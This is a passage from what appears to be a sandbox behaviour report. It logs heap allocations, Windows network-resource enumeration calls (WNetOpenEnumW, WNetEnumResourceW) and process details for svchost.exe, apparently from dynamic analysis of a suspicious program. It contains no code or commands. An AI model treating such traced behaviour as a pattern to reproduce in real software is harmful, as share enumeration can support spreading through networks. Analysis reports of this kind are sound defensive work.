returned 1 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x7c0000 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x150) returned 0x3227170 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32531e0 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253228 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3252f58 [0222.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3aa1518 [0222.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253348 | out: hHeap=0x750000) returned 1 [0222.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252a90 | out: hHeap=0x750000) returned 1 [0222.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32532b8 | out: hHeap=0x750000) returned 1 [0222.795] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253270 | out: hHeap=0x750000) returned 1 [0222.795] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x326f728 | out: hHeap=0x750000) returned 1 [0222.795] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0222.795] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db38 [0222.795] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x32e3398, lphEnum=0x3a7fe28 | out: lphEnum=0x3a7fe28*=0x3a7fe44) returned 0x4c6 [0222.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0222.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7c0000 | out: hHeap=0x750000) returned 1 [0222.833] WNetEnumResourceW (in: hEnum=0x3277ce8, lpcCount=0x3a7fedc, lpBuffer=0x32e3358, lpBufferSize=0x3a7fed8 | out: lpcCount=0x3a7fedc, lpBuffer=0x32e3358, lpBufferSize=0x3a7fed8) returned 0x103 [0222.833] WNetCloseEnum (hEnum=0x3277ce8) returned 0x0 [0222.833] SendMessageW (hWnd=0x2011c, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1c26c000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e3d6" [0xc000000f], "LOCAL" [0x7] Thread: id = 137 os_tid = 0x4dc Thread: id = 138 os_tid = 0x4c0 Thread: id = 139 os_tid = 0x7e0 Thread: id = 140 os_tid = 0x7b4 Thread: id = 141 os_tid = 0x7a8 Thread: id = 142 os_tid = 0x7a0 Thread: id = 143 os_tid = 0x784 Thread: id = 144 os_tid = 0x744 Thread: id = 145 os_tid = 0x594 Thread: id = 146 os_tid = 0x15c Thread: id = 147 os_tid = 0x138 Thread: id = 148 os_tid = 0x64 Thread: id = 149 os_tid = 0x128 Thread: id = 150 os_tid = 0x130 Thread: id = 151 os_tid = 0x118